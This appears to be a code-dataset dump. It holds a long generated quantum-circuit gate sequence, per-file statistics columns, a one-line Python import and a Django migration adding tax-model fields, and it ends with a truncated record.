sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.Y(4))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.H(4))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.RZ(2.255147, 4))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.H(0))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.072369, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.H(1))
sim.append(sim.H(0))
sim.append(sim.Y(1))
sim.append(sim.Y(0))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.072369, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.Y(1))
sim.append(sim.Y(0))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.769972, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.769972, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.H(2))
sim.append(sim.H(1))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(4.363377, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.H(2))
sim.append(sim.H(1))
sim.append(sim.Y(2))
sim.append(sim.Y(1))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(4.363377, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.Y(2))
sim.append(sim.Y(1))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.4094162, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.4094162, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.H(3))
sim.append(sim.H(1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.037717, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.H(3))
sim.append(sim.H(1))
sim.append(sim.Y(3))
sim.append(sim.Y(1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.037717, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.Y(3))
sim.append(sim.Y(1))
sim.append(sim.H(3))
sim.append(sim.H(2))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.949632, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.H(3))
sim.append(sim.H(2))
sim.append(sim.Y(3))
sim.append(sim.Y(2))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.949632, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.Y(3))
sim.append(sim.Y(2))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.725793, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.725793, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.286858, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.286858, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(3.531732, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(3.531732, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(0.2812523, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(0.2812523, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.586907, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.586907, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.1029809, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.1029809, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.H(5))
sim.append(sim.H(2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(0.3621992, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(2))
sim.append(sim.Y(5))
sim.append(sim.Y(2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(0.3621992, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(2))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(1.144365, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(1.144365, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.CX(5, 4))
sim.append(sim.RZ(4.962369, 4))
sim.append(sim.CX(5, 4))
sim.append(sim.H(5))
sim.append(sim.H(4))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.CX(5, 4))
sim.append(sim.RZ(4.962369, 4))
sim.append(sim.CX(5, 4))
sim.append(sim.Y(5))
sim.append(sim.Y(4))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.072176, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.072176, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.936195, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.936195, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(4.511295, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(4.511295, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.864273, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.864273, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.RZ(3.494444, 4))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.RZ(3.494444, 4))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.CX(6, 5))
sim.append(sim.RZ(5.171286, 5))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.CX(6, 5))
sim.append(sim.RZ(5.171286, 5))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.H(7))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.792309, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.792309, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.439179, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.439179, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(4.7732, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(2))
sim.append(sim.Y(7))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(4.7732, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(2))
sim.append(sim.H(7))
sim.append(sim.H(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(2.95733, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(3))
sim.append(sim.Y(7))
sim.append(sim.Y(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(2.95733, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(3))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.RZ(1.482614, 4))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.RZ(1.482614, 4))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.RZ(4.528935, 5))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.RZ(4.528935, 5))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.CX(7, 6))
sim.append(sim.RZ(3.161797, 6))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.CX(7, 6))
sim.append(sim.RZ(3.161797, 6))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.upload()
sim.run()
sim.measure(10)
| 23.650157
| 58
| 0.654031
| 60,801
| 255,942
| 2.753063
| 0.00222
| 0.581113
| 0.774818
| 0.459003
| 0.999098
| 0.999098
| 0.999098
| 0.999098
| 0.999098
| 0.999098
| 0
| 0.086321
| 0.066187
| 255,942
| 10,821
| 59
| 23.652343
| 0.614045
| 0
| 0
| 0.999168
| 0
| 0
| 0.000133
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.000185
| 0
| 0.000185
| 0.000092
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
e6f6bef0631a537e0176e1e5413d2b7abb4f9377
| 68
|
py
|
Python
|
strategies/blueprints/two_assets_MA/__init__.py
|
fredmanre/dockerizer
|
9d481bfef0199578ad5e0f19e9596e3aeec3c18d
|
[
"MIT"
] | 1
|
2020-10-19T04:12:21.000Z
|
2020-10-19T04:12:21.000Z
|
strategies/blueprints/two_assets_MA/__init__.py
|
fredmanre/dockerizer
|
9d481bfef0199578ad5e0f19e9596e3aeec3c18d
|
[
"MIT"
] | null | null | null |
strategies/blueprints/two_assets_MA/__init__.py
|
fredmanre/dockerizer
|
9d481bfef0199578ad5e0f19e9596e3aeec3c18d
|
[
"MIT"
] | null | null | null |
from strategies.blueprints.two_assets_MA.views import two_assets_MA
| 34
| 67
| 0.897059
| 11
| 68
| 5.181818
| 0.727273
| 0.315789
| 0.385965
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 68
| 1
| 68
| 68
| 0.890625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 8
|
fc38a4f8532909ed5dc40a610970154a4a6d200a
| 7,610
|
py
|
Python
|
webapp/apps/taxbrain/migrations/0056_auto_20171120_2123.py
|
OpenSourcePolicyCenter/PolicyBrain
|
5edffcd5cf8bb6544afc1ed982636abe66e246e1
|
[
"MIT"
] | 13
|
2017-11-07T15:54:42.000Z
|
2018-09-27T20:56:28.000Z
|
webapp/apps/taxbrain/migrations/0056_auto_20171120_2123.py
|
OpenSourcePolicyCenter/webapp-public
|
5edffcd5cf8bb6544afc1ed982636abe66e246e1
|
[
"MIT"
] | 547
|
2015-08-07T21:32:51.000Z
|
2017-09-14T21:25:43.000Z
|
webapp/apps/taxbrain/migrations/0056_auto_20171120_2123.py
|
OpenSourcePolicyCenter/webapp-public
|
5edffcd5cf8bb6544afc1ed982636abe66e246e1
|
[
"MIT"
] | 23
|
2015-08-07T20:55:39.000Z
|
2017-08-25T19:20:20.000Z
|
# -*- coding: utf-8 -*-
from django.db import models, migrations
import webapp.apps.taxbrain.models
class Migration(migrations.Migration):
dependencies = [
('taxbrain', '0055_remove_taxsaveinputs_reform_style'),
]
operations = [
migrations.AddField(
model_name='taxsaveinputs',
name='CTC_new_for_all',
field=models.CharField(default=b'False', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='DependentCredit_Child_c',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='DependentCredit_Nonchild_c',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='DependentCredit_before_CTC',
field=models.CharField(default=b'False', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='FilerCredit_c_0',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='FilerCredit_c_1',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='FilerCredit_c_2',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='FilerCredit_c_3',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='FilerCredit_c_4',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='FilerCredit_c_cpi',
field=models.NullBooleanField(default=None),
),
migrations.AddField(
model_name='taxsaveinputs',
name='ID_AmountCap_Switch_0',
field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='ID_AmountCap_Switch_1',
field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='ID_AmountCap_Switch_2',
field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='ID_AmountCap_Switch_3',
field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='ID_AmountCap_Switch_4',
field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='ID_AmountCap_Switch_5',
field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='ID_AmountCap_Switch_6',
field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='ID_AmountCap_rt',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='ID_AmountCap_rt_cpi',
field=models.NullBooleanField(default=None),
),
migrations.AddField(
model_name='taxsaveinputs',
name='II_credit_nr_ps_0',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='II_credit_nr_ps_1',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='II_credit_nr_ps_2',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='II_credit_nr_ps_3',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='II_credit_nr_ps_4',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='II_credit_nr_ps_cpi',
field=models.NullBooleanField(default=None),
),
migrations.AddField(
model_name='taxsaveinputs',
name='PT_EligibleRate_active',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='PT_EligibleRate_passive',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='PT_exclusion_rt',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='PT_exclusion_wage_limit',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='PT_exclusion_wage_limit_cpi',
field=models.NullBooleanField(default=None),
),
migrations.AddField(
model_name='taxsaveinputs',
name='PT_top_stacking',
field=models.CharField(default=b'True', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='PT_wages_active_income',
field=models.CharField(default=b'False', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='cpi_offset',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
]
| 42.044199
| 119
| 0.619185
| 780
| 7,610
| 5.841026
| 0.098718
| 0.130378
| 0.166594
| 0.195566
| 0.942493
| 0.942493
| 0.932836
| 0.932836
| 0.927568
| 0.923837
| 0
| 0.017538
| 0.265703
| 7,610
| 180
| 120
| 42.277778
| 0.797781
| 0.00276
| 0
| 0.763006
| 0
| 0
| 0.151048
| 0.04969
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.00578
| 0.011561
| 0
| 0.028902
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fc5dc1b335d1415110734d91cdd642e0fb4c934b
| 100
|
py
|
Python
|
